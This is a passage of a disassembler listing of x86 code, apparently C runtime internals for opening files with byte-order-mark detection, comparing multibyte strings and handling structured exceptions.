sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FEh
loc_40E2CE: ; CODE XREF: sub_40E072+2A2�j
call ds:dword_41D0F0
push eax
call sub_4057F9
loc_40E2DA: ; CODE XREF: sub_40E072+345�j
pop ecx
loc_40E2DB: ; CODE XREF: sub_40E072+217�j
call sub_4057D3
mov eax, [eax]
jmp loc_40E6AB
; ---------------------------------------------------------------------------
loc_40E2E7: ; CODE XREF: sub_40E072+23F�j
push edi
call ds:dword_41D148
cmp eax, ebx
jnz short loc_40E316
mov esi, [esi]
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FEh
push edi
call ds:dword_41D0DC
jmp short loc_40E2CE
; ---------------------------------------------------------------------------
loc_40E316: ; CODE XREF: sub_40E072+27E�j
cmp eax, 2
jnz short loc_40E321
or [ebp+var_1], 40h
jmp short loc_40E32A
; ---------------------------------------------------------------------------
loc_40E321: ; CODE XREF: sub_40E072+2A7�j
cmp eax, 3
jnz short loc_40E32A
or [ebp+var_1], 8
loc_40E32A: ; CODE XREF: sub_40E072+2AD�j
; sub_40E072+2B2�j
push edi
push dword ptr [esi]
call sub_40EC7F
mov eax, [esi]
mov edx, eax
and eax, 1Fh
imul eax, 28h
sar edx, 5
mov edx, ds:dword_433CA0[edx*4]
pop ecx
pop ecx
mov cl, [ebp+var_1]
or cl, 1
mov [edx+eax+4], cl
mov eax, [esi]
mov edx, eax
and eax, 1Fh
imul eax, 28h
sar edx, 5
mov edx, ds:dword_433CA0[edx*4]
lea eax, [edx+eax+24h]
and byte ptr [eax], 80h
mov [ebp+var_3], cl
and [ebp+var_3], 48h
mov [ebp+var_1], cl
jnz loc_40E3FD
test cl, 80h
jz loc_40E637
test byte ptr [ebp+arg_8], 2
jz short loc_40E3FD
push 2
or edi, 0FFFFFFFFh
push edi
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_40E3BC
call sub_4057E6
cmp dword ptr [eax], 83h
jz short loc_40E3FD
loc_40E3B0: ; CODE XREF: sub_40E072+379�j
; sub_40E072+389�j ...
push dword ptr [esi]
call sub_408A4D
jmp loc_40E2DA
; ---------------------------------------------------------------------------
loc_40E3BC: ; CODE XREF: sub_40E072+32F�j
push 1
lea eax, [ebp+var_4]
push eax
push dword ptr [esi]
mov [ebp+var_4], bl
call sub_409DAD
add esp, 0Ch
test eax, eax
jnz short loc_40E3ED
cmp [ebp+var_4], 1Ah
jnz short loc_40E3ED
mov eax, [ebp+var_8]
cdq
push edx
push eax
push dword ptr [esi]
call sub_4105A7
add esp, 0Ch
cmp eax, edi
jz short loc_40E3B0
loc_40E3ED: ; CODE XREF: sub_40E072+35F�j
; sub_40E072+365�j
push ebx
push ebx
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
cmp eax, edi
jz short loc_40E3B0
loc_40E3FD: ; CODE XREF: sub_40E072+305�j
; sub_40E072+318�j ...
test [ebp+var_1], 80h
jz loc_40E637
mov ecx, 74000h
test [ebp+arg_8], ecx
mov edi, 4000h
jnz short loc_40E425
mov eax, [ebp+var_14]
and eax, ecx
jnz short loc_40E422
or [ebp+arg_8], edi
jmp short loc_40E425
; ---------------------------------------------------------------------------
loc_40E422: ; CODE XREF: sub_40E072+3A9�j
or [ebp+arg_8], eax
loc_40E425: ; CODE XREF: sub_40E072+3A2�j
; sub_40E072+3AE�j
mov eax, [ebp+arg_8]
and eax, ecx
cmp eax, edi
jz short loc_40E472
cmp eax, 10000h
jz short loc_40E45E
cmp eax, 14000h
jz short loc_40E45E
cmp eax, 20000h
jz short loc_40E46C
cmp eax, 24000h
jz short loc_40E46C
cmp eax, 40000h
jz short loc_40E458
cmp eax, 44000h
jnz short loc_40E475
loc_40E458: ; CODE XREF: sub_40E072+3DD�j
mov [ebp+var_2], 1
jmp short loc_40E475
; ---------------------------------------------------------------------------
loc_40E45E: ; CODE XREF: sub_40E072+3C1�j
; sub_40E072+3C8�j
mov ecx, [ebp+arg_8]
mov eax, 301h
and ecx, eax
cmp ecx, eax
jnz short loc_40E475
loc_40E46C: ; CODE XREF: sub_40E072+3CF�j
; sub_40E072+3D6�j
mov [ebp+var_2], 2
jmp short loc_40E475
; ---------------------------------------------------------------------------
loc_40E472: ; CODE XREF: sub_40E072+3BA�j
mov [ebp+var_2], bl
loc_40E475: ; CODE XREF: sub_40E072+3E4�j
; sub_40E072+3EA�j ...
test [ebp+arg_8], 70000h
jz loc_40E637
test [ebp+var_1], 40h
mov [ebp+var_8], ebx
jnz loc_40E637
mov eax, [ebp+var_C]
mov ecx, 0C0000000h
and eax, ecx
cmp eax, 40000000h
jz loc_40E55B
cmp eax, 80000000h
jz short loc_40E522
cmp eax, ecx
jnz loc_40E637
mov eax, [ebp+var_10]
cmp eax, ebx
jbe loc_40E637
cmp eax, 2
jbe short loc_40E4D1
cmp eax, 4
jbe short loc_40E4F8
loc_40E4C8: ; CODE XREF: sub_40E072+500�j
cmp eax, 5
jnz loc_40E637
loc_40E4D1: ; CODE XREF: sub_40E072+44F�j
; sub_40E072+496�j ...
movsx eax, [ebp+var_2]
xor edi, edi
dec eax
jz loc_40E604
dec eax
jnz loc_40E637
mov [ebp+var_8], 0FEFFh
mov [ebp+var_10], 2
jmp loc_40E612
; ---------------------------------------------------------------------------
loc_40E4F8: ; CODE XREF: sub_40E072+454�j
push 2
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
add esp, 10h
or eax, edx
jz short loc_40E4D1
push ebx
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
loc_40E522: ; CODE XREF: sub_40E072+437�j
push 3
lea eax, [ebp+var_8]
push eax
push dword ptr [esi]
call sub_409DAD
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
cmp eax, 2
jz short loc_40E5AB
cmp eax, 3
jnz loc_40E5F6
cmp [ebp+var_8], 0BFBBEFh
jnz short loc_40E5AB
mov [ebp+var_2], 1
jmp loc_40E637
; ---------------------------------------------------------------------------
loc_40E55B: ; CODE XREF: sub_40E072+42C�j
mov eax, [ebp+var_10]
cmp eax, ebx
jbe loc_40E637
cmp eax, 2
jbe loc_40E4D1
cmp eax, 4
ja loc_40E4C8
push 2
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
add esp, 10h
or eax, edx
jz loc_40E4D1
push ebx
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
add esp, 10h
and eax, edx
loc_40E59D: ; CODE XREF: sub_40E072+590�j
cmp eax, 0FFFFFFFFh
jnz loc_40E637
jmp loc_40E3B0
; ---------------------------------------------------------------------------
loc_40E5AB: ; CODE XREF: sub_40E072+4CC�j
; sub_40E072+4DE�j
mov eax, [ebp+var_8]
and eax, 0FFFFh
cmp eax, 0FFFEh
jnz short loc_40E5D3
push dword ptr [esi]
call sub_408A4D
pop ecx
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_40E5CC: ; CODE XREF: sub_40E072+C6�j
mov eax, esi
jmp loc_40E6AB
; ---------------------------------------------------------------------------
loc_40E5D3: ; CODE XREF: sub_40E072+546�j
cmp eax, 0FEFFh
jnz short loc_40E5F6
push ebx
push 2
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
mov [ebp+var_2], 2
jmp short loc_40E637
; ---------------------------------------------------------------------------
loc_40E5F6: ; CODE XREF: sub_40E072+4D1�j
; sub_40E072+566�j
push ebx
push ebx
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
jmp short loc_40E59D
; ---------------------------------------------------------------------------
loc_40E604: ; CODE XREF: sub_40E072+466�j
mov [ebp+var_8], 0BFBBEFh
mov [ebp+var_10], 3
loc_40E612: ; CODE XREF: sub_40E072+481�j
; sub_40E072+5C3�j
mov eax, [ebp+var_10]
sub eax, edi
push eax
lea eax, [ebp+edi+var_8]
push eax
push dword ptr [esi]
call sub_40D420
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
add edi, eax
cmp [ebp+var_10], edi
jg short loc_40E612
loc_40E637: ; CODE XREF: sub_40E072+30E�j
; sub_40E072+38F�j ...
mov eax, [esi]
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, ds:dword_433CA0[ecx*4]
lea eax, [ecx+eax+24h]
mov cl, [eax]
xor cl, [ebp+var_2]
and cl, 7Fh
xor [eax], cl
mov eax, [esi]
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, ds:dword_433CA0[ecx*4]
lea eax, [ecx+eax+24h]
mov ecx, [ebp+arg_8]
mov dl, [eax]
shr ecx, 10h
shl cl, 7
and dl, 7Fh
or cl, dl
cmp [ebp+var_3], bl
mov [eax], cl
jnz short loc_40E6A9
test byte ptr [ebp+arg_8], 8
jz short loc_40E6A9
mov esi, [esi]
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+esi+4]
or byte ptr [eax], 20h
loc_40E6A9: ; CODE XREF: sub_40E072+614�j
; sub_40E072+61A�j
mov eax, ebx
loc_40E6AB: ; CODE XREF: sub_40E072+270�j
; sub_40E072+55C�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E072 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E6B0 proc near ; CODE XREF: sub_40E77C+14�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 14h
push offset dword_421860
call __SEH_prolog4
xor esi, esi
mov [ebp+var_1C], esi
xor eax, eax
mov edi, [ebp+arg_10]
cmp edi, esi
setnz al
cmp eax, esi
jnz short loc_40E6EA
loc_40E6CF: ; CODE XREF: sub_40E6B0+47�j
; sub_40E6B0+5B�j
call sub_4057D3
push 16h
pop edi
mov [eax], edi
push esi
push esi
push esi
push esi
push esi
call sub_402F39
add esp, 14h
mov eax, edi
jmp short loc_40E743
; ---------------------------------------------------------------------------
loc_40E6EA: ; CODE XREF: sub_40E6B0+1D�j
or dword ptr [edi], 0FFFFFFFFh
xor eax, eax
cmp [ebp+arg_0], esi
setnz al
cmp eax, esi
jz short loc_40E6CF
cmp [ebp+arg_14], esi
jz short loc_40E70D
mov eax, [ebp+arg_C]
and eax, 0FFFFFE7Fh
neg eax
sbb eax, eax
inc eax
jz short loc_40E6CF
loc_40E70D: ; CODE XREF: sub_40E6B0+4C�j
mov [ebp+ms_exc.disabled], esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_1C]
push eax
mov eax, edi
call sub_40E072
add esp, 14h
mov [ebp+var_20], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40E74E
mov eax, [ebp+var_20]
cmp eax, esi
jz short loc_40E743
or dword ptr [edi], 0FFFFFFFFh
loc_40E743: ; CODE XREF: sub_40E6B0+38�j
; sub_40E6B0+8E�j
call __SEH_epilog4
retn
sub_40E6B0 endp
; =============== S U B R O U T I N E =======================================
sub_40E749 proc near ; DATA XREF: seg001:00421878�o
xor esi, esi
mov edi, [ebp+18h]
sub_40E749 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40E74E proc near ; CODE XREF: sub_40E6B0+84�p
cmp [ebp-1Ch], esi
jz short locret_40E77B
cmp [ebp-20h], esi
jz short loc_40E773
mov eax, [edi]
mov ecx, eax
sar ecx, 5
and eax, 1Fh
imul eax, 28h
mov ecx, ds:dword_433CA0[ecx*4]
lea eax, [ecx+eax+4]
and byte ptr [eax], 0FEh
loc_40E773: ; CODE XREF: sub_40E74E+8�j
push dword ptr [edi]
call sub_40EE8E
pop ecx
locret_40E77B: ; CODE XREF: sub_40E74E+3�j
retn
sub_40E74E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E77C proc near ; CODE XREF: sub_4081FF+26D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 1
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40E6B0
add esp, 18h
pop ebp
retn
sub_40E77C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E79A proc near ; CODE XREF: sub_40E9B4+A�p
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push [ebp+arg_8]
lea ecx, [ebp+var_14]
call sub_40271F
mov edx, [ebp+arg_0]
xor esi, esi
cmp edx, esi
jnz short loc_40E7E4
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40E7DA
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E7DA: ; CODE XREF: sub_40E79A+37�j
mov eax, 7FFFFFFFh
jmp loc_40E9B1
; ---------------------------------------------------------------------------
loc_40E7E4: ; CODE XREF: sub_40E79A+19�j
push ebx
mov ebx, [ebp+arg_4]
cmp ebx, esi
jnz short loc_40E81B
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40E811
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E811: ; CODE XREF: sub_40E79A+6E�j
mov eax, 7FFFFFFFh
jmp loc_40E9B0
; ---------------------------------------------------------------------------
loc_40E81B: ; CODE XREF: sub_40E79A+50�j
mov eax, [ebp+var_10]
cmp [eax+8], esi
jnz short loc_40E847
lea eax, [ebp+var_14]
push eax
push ebx
push edx
call sub_4027D6
add esp, 0Ch
cmp [ebp+var_8], 0
jz loc_40E9B0
mov ecx, [ebp+var_C]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40E9B0
; ---------------------------------------------------------------------------
loc_40E847: ; CODE XREF: sub_40E79A+87�j
push edi
mov edi, 200h
loc_40E84D: ; CODE XREF: sub_40E79A+1CD�j
movzx cx, byte ptr [edx]
movzx ecx, cx
movzx esi, cl
inc edx
test byte ptr [esi+eax+1Dh], 4
mov [ebp+arg_0], edx
jz short loc_40E8BB
cmp byte ptr [edx], 0
jnz short loc_40E86B
xor esi, esi
jmp short loc_40E8D7
; ---------------------------------------------------------------------------
loc_40E86B: ; CODE XREF: sub_40E79A+CB�j
push 1
push dword ptr [eax+4]
lea ecx, [ebp+var_4]
push 2
push ecx
push 2
dec edx
push edx
push edi
push dword ptr [eax+0Ch]
lea eax, [ebp+var_14]
push eax
call sub_40C2F9
add esp, 24h
cmp eax, 1
jnz short loc_40E896
movzx ax, [ebp+var_4]
jmp short loc_40E8B0
; ---------------------------------------------------------------------------
loc_40E896: ; CODE XREF: sub_40E79A+F3�j
cmp eax, 2
jnz loc_40E96C
movzx ax, [ebp+var_4]
movzx cx, [ebp+var_3]
shl ax, 8
add ax, cx
loc_40E8B0: ; CODE XREF: sub_40E79A+FA�j
inc [ebp+arg_0]
movzx esi, ax
mov eax, [ebp+var_10]
jmp short loc_40E8D7
; ---------------------------------------------------------------------------
loc_40E8BB: ; CODE XREF: sub_40E79A+C6�j
movzx edx, cx
lea ecx, [edx+eax]
test byte ptr [ecx+1Dh], 10h
jz short loc_40E8D4
movzx cx, byte ptr [ecx+11Dh]
movzx esi, cx
jmp short loc_40E8D7
; ---------------------------------------------------------------------------
loc_40E8D4: ; CODE XREF: sub_40E79A+12B�j
movzx esi, dx
loc_40E8D7: ; CODE XREF: sub_40E79A+CF�j
; sub_40E79A+11F�j ...
movzx cx, byte ptr [ebx]
movzx ecx, cx
movzx edx, cl
inc ebx
test byte ptr [edx+eax+1Dh], 4
jz short loc_40E93E
cmp byte ptr [ebx], 0
jnz short loc_40E8F2
xor ecx, ecx
jmp short loc_40E95A
; ---------------------------------------------------------------------------
loc_40E8F2: ; CODE XREF: sub_40E79A+152�j
push 1
push dword ptr [eax+4]
lea ecx, [ebp+var_4]
push 2
push ecx
push 2
lea ecx, [ebx-1]
push ecx
push edi
push dword ptr [eax+0Ch]
lea eax, [ebp+var_14]
push eax
call sub_40C2F9
add esp, 24h
cmp eax, 1
jnz short loc_40E91F
movzx ax, [ebp+var_4]
jmp short loc_40E935
; ---------------------------------------------------------------------------
loc_40E91F: ; CODE XREF: sub_40E79A+17C�j
cmp eax, 2
jnz short loc_40E96C
movzx ax, [ebp+var_4]
movzx cx, [ebp+var_3]
shl ax, 8
add ax, cx
loc_40E935: ; CODE XREF: sub_40E79A+183�j
movzx ecx, ax
mov eax, [ebp+var_10]
inc ebx
jmp short loc_40E95A
; ---------------------------------------------------------------------------
loc_40E93E: ; CODE XREF: sub_40E79A+14D�j
movzx edx, cx
lea ecx, [edx+eax]
test byte ptr [ecx+1Dh], 10h
jz short loc_40E957
movzx cx, byte ptr [ecx+11Dh]
movzx ecx, cx
jmp short loc_40E95A
; ---------------------------------------------------------------------------
loc_40E957: ; CODE XREF: sub_40E79A+1AE�j
movzx ecx, dx
loc_40E95A: ; CODE XREF: sub_40E79A+156�j
; sub_40E79A+1A2�j ...
cmp cx, si
jnz short loc_40E98B
test si, si
jz short loc_40E9A0
mov edx, [ebp+arg_0]
jmp loc_40E84D
; ---------------------------------------------------------------------------
loc_40E96C: ; CODE XREF: sub_40E79A+FF�j
; sub_40E79A+188�j
call sub_4057D3
mov dword ptr [eax], 16h
cmp [ebp+var_8], 0
jz short loc_40E984
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E984: ; CODE XREF: sub_40E79A+1E1�j
mov eax, 7FFFFFFFh
jmp short loc_40E9AF
; ---------------------------------------------------------------------------
loc_40E98B: ; CODE XREF: sub_40E79A+1C3�j
sbb eax, eax
and eax, 2
dec eax
cmp [ebp+var_8], 0
jz short loc_40E9AF
mov ecx, [ebp+var_C]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_40E9AF
; ---------------------------------------------------------------------------
loc_40E9A0: ; CODE XREF: sub_40E79A+1C8�j
cmp [ebp+var_8], 0
jz short loc_40E9AD
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E9AD: ; CODE XREF: sub_40E79A+20A�j
xor eax, eax
loc_40E9AF: ; CODE XREF: sub_40E79A+1EF�j
; sub_40E79A+1FB�j ...
pop edi
loc_40E9B0: ; CODE XREF: sub_40E79A+7C�j
; sub_40E79A+9B�j ...
pop ebx
loc_40E9B1: ; CODE XREF: sub_40E79A+45�j
pop esi
leave
retn
sub_40E79A endp
; =============== S U B R O U T I N E =======================================
sub_40E9B4 proc near ; CODE XREF: sub_4081FF+1E6�p
; sub_4081FF+203�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 0
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_40E79A
add esp, 0Ch
retn
sub_40E9B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9C7 proc near ; CODE XREF: sub_40EB30+E�p
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_40E9DC
xor eax, eax
jmp loc_40EB19
; ---------------------------------------------------------------------------
loc_40E9DC: ; CODE XREF: sub_40E9C7+C�j
push edi
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_40271F
mov edi, [ebp+var_C]
cmp [edi+8], ebx
jnz short loc_40EA16
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C8F9
add esp, 0Ch
cmp [ebp+var_4], bl
jz loc_40EB18
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40EB18
; ---------------------------------------------------------------------------
loc_40EA16: ; CODE XREF: sub_40E9C7+27�j
cmp [ebp+arg_0], ebx
jnz short loc_40EA49
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40EA3F
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EA3F: ; CODE XREF: sub_40E9C7+6F�j
mov eax, 7FFFFFFFh
jmp loc_40EB18
; ---------------------------------------------------------------------------
loc_40EA49: ; CODE XREF: sub_40E9C7+52�j
push esi
mov esi, [ebp+arg_4]
cmp esi, ebx
jnz short loc_40EA7F
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40EA75
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EA75: ; CODE XREF: sub_40E9C7+A5�j
mov eax, 7FFFFFFFh
jmp loc_40EB17
; ---------------------------------------------------------------------------
loc_40EA7F: ; CODE XREF: sub_40E9C7+88�j
; sub_40E9C7+13C�j
mov eax, [ebp+arg_0]
movzx cx, byte ptr [eax]
dec [ebp+arg_8]
movzx ecx, cx
movzx edx, cl
inc eax
test byte ptr [edx+edi+1Dh], 4
mov [ebp+arg_0], eax
jz short loc_40EAC6
cmp [ebp+arg_8], ebx
jnz short loc_40EAB0
movzx eax, byte ptr [esi]
xor ecx, ecx
test byte ptr [eax+edi+1Dh], 4
jnz short loc_40EB09
movzx eax, ax
jmp short loc_40EAF6
; ---------------------------------------------------------------------------
loc_40EAB0: ; CODE XREF: sub_40E9C7+D6�j
mov al, [eax]
cmp al, bl
jnz short loc_40EABA
xor ecx, ecx
jmp short loc_40EAC6
; ---------------------------------------------------------------------------
loc_40EABA: ; CODE XREF: sub_40E9C7+ED�j
xor edx, edx
inc [ebp+arg_0]
mov dh, cl
mov dl, al
movzx ecx, dx
loc_40EAC6: ; CODE XREF: sub_40E9C7+D1�j
; sub_40E9C7+F1�j
movzx ax, byte ptr [esi]
movzx eax, ax
movzx edx, al
inc esi
test byte ptr [edx+edi+1Dh], 4
jz short loc_40EAF6
cmp [ebp+arg_8], ebx
jnz short loc_40EAE1
loc_40EADD: ; CODE XREF: sub_40E9C7+121�j
xor eax, eax
jmp short loc_40EAF6
; ---------------------------------------------------------------------------
loc_40EAE1: ; CODE XREF: sub_40E9C7+114�j
mov dl, [esi]
dec [ebp+arg_8]
cmp dl, bl
jz short loc_40EADD
xor ebx, ebx
mov bh, al
inc esi
mov bl, dl
movzx eax, bx
xor ebx, ebx
loc_40EAF6: ; CODE XREF: sub_40E9C7+E7�j
; sub_40E9C7+10F�j ...
cmp ax, cx
jnz short loc_40EB1C
cmp cx, bx
jz short loc_40EB09
cmp [ebp+arg_8], ebx
jnz loc_40EA7F
loc_40EB09: ; CODE XREF: sub_40E9C7+E2�j
; sub_40E9C7+137�j
cmp [ebp+var_4], bl
jz short loc_40EB15
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EB15: ; CODE XREF: sub_40E9C7+145�j
xor eax, eax
loc_40EB17: ; CODE XREF: sub_40E9C7+B3�j
; sub_40E9C7+15E�j ...
pop esi
loc_40EB18: ; CODE XREF: sub_40E9C7+3D�j
; sub_40E9C7+4A�j ...
pop edi
loc_40EB19: ; CODE XREF: sub_40E9C7+10�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40EB1C: ; CODE XREF: sub_40E9C7+132�j
sbb eax, eax
and eax, 2
dec eax
cmp [ebp+var_4], bl
jz short loc_40EB17
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_40EB17
sub_40E9C7 endp
; =============== S U B R O U T I N E =======================================
sub_40EB30 proc near ; CODE XREF: sub_4081FF+1D1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40E9C7
add esp, 10h
retn
sub_40EB30 endp
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_40EB60
push dword ptr [ebp+8]
call sub_413976
loc_40EB60: ; DATA XREF: seg000:0040EB53�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40EB68: ; DATA XREF: sub_40EBAD+B�o
; seg000:0040EC3A�o
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_40EBAC
mov eax, [esp+14h]
mov ecx, [eax-4]
xor ecx, eax
call sub_402710
push ebp
mov ebp, [eax+10h]
mov edx, [eax+28h]
push edx
mov edx, [eax+24h]
push edx
call sub_40EBAD
add esp, 8
pop ebp
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_40EBAC: ; CODE XREF: seg000:0040EB78�j
retn
; =============== S U B R O U T I N E =======================================
sub_40EBAD proc near ; CODE XREF: seg000:0040EB94�p
var_20 = dword ptr -20h
var_18 = dword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push ebp
push eax
push 0FFFFFFFEh
push offset loc_40EB68
push large dword ptr fs:0
mov eax, ds:dword_423064
xor eax, esp
push eax
lea eax, [esp+24h+var_20]
mov large fs:0, eax
loc_40EBD6: ; CODE XREF: sub_40EBAD:loc_40EC1D�j
mov eax, [esp+24h+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40EC1F
cmp [esp+24h+arg_4], 0FFFFFFFFh
jz short loc_40EBF2
cmp esi, [esp+24h+arg_4]
jbe short loc_40EC1F
loc_40EBF2: ; CODE XREF: sub_40EBAD+3D�j
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+24h+var_18], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40EC1D
push 101h
mov eax, [ebx+esi*4+8]
call sub_40EC5D
mov eax, [ebx+esi*4+8]
call sub_40EC7C
loc_40EC1D: ; CODE XREF: sub_40EBAD+57�j
jmp short loc_40EBD6
; ---------------------------------------------------------------------------
loc_40EC1F: ; CODE XREF: sub_40EBAD+36�j
; sub_40EBAD+43�j
mov ecx, [esp+24h+var_20]
mov large fs:0, ecx
add esp, 18h
pop edi
pop esi
pop ebx
retn
sub_40EBAD endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset loc_40EB68
jnz short locret_40EC53
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40EC53
mov eax, 1
locret_40EC53: ; CODE XREF: seg000:0040EC41�j
; seg000:0040EC4C�j
retn
; =============== S U B R O U T I N E =======================================
sub_40EC54 proc near ; CODE XREF: sub_40BEF0+1E�p
; sub_40BEF0+40�p
push ebx
push ecx
mov ebx, offset dword_423FB0
jmp short loc_40EC68
sub_40EC54 endp
; =============== S U B R O U T I N E =======================================
sub_40EC5D proc near ; CODE XREF: sub_4085C8+6E�p
; sub_406640+2099�p ...
arg_0 = dword ptr 4
push ebx
push ecx
mov ebx, offset dword_423FB0
mov ecx, [esp+8+arg_0]
loc_40EC68: ; CODE XREF: sub_40EC54+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
push ebp
push ecx
push eax
pop eax
pop ecx
pop ebp
pop ecx
pop ebx
retn 4
sub_40EC5D endp
; =============== S U B R O U T I N E =======================================
sub_40EC7C proc near ; CODE XREF: sub_4085C8+7B�p
; sub_40EBAD+6B�p
call eax
retn
sub_40EC7C endp
; =============== S U B R O U T I N E =======================================
sub_40EC7F proc near ; CODE XREF: sub_40E072+2BB�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
test eax, eax
push esi
push edi
jl short loc_40ECE3
cmp eax, ds:dword_433C84
jnb short loc_40ECE3
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, eax
sar ecx, 5
lea edi, ds:433CA0h[ecx*4]
mov ecx, [edi]
cmp dword ptr [esi+ecx], 0FFFFFFFFh
jnz short loc_40ECE3
cmp ds:dword_423050, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_40ECD9
sub eax, 0
jz short loc_40ECD0
dec eax
jz short loc_40ECCB
dec eax
jnz short loc_40ECD9
push ebx
push 0FFFFFFF4h
jmp short loc_40ECD3
; ---------------------------------------------------------------------------
loc_40ECCB: ; CODE XREF: sub_40EC7F+42�j
push ebx
push 0FFFFFFF5h
jmp short loc_40ECD3
; ---------------------------------------------------------------------------
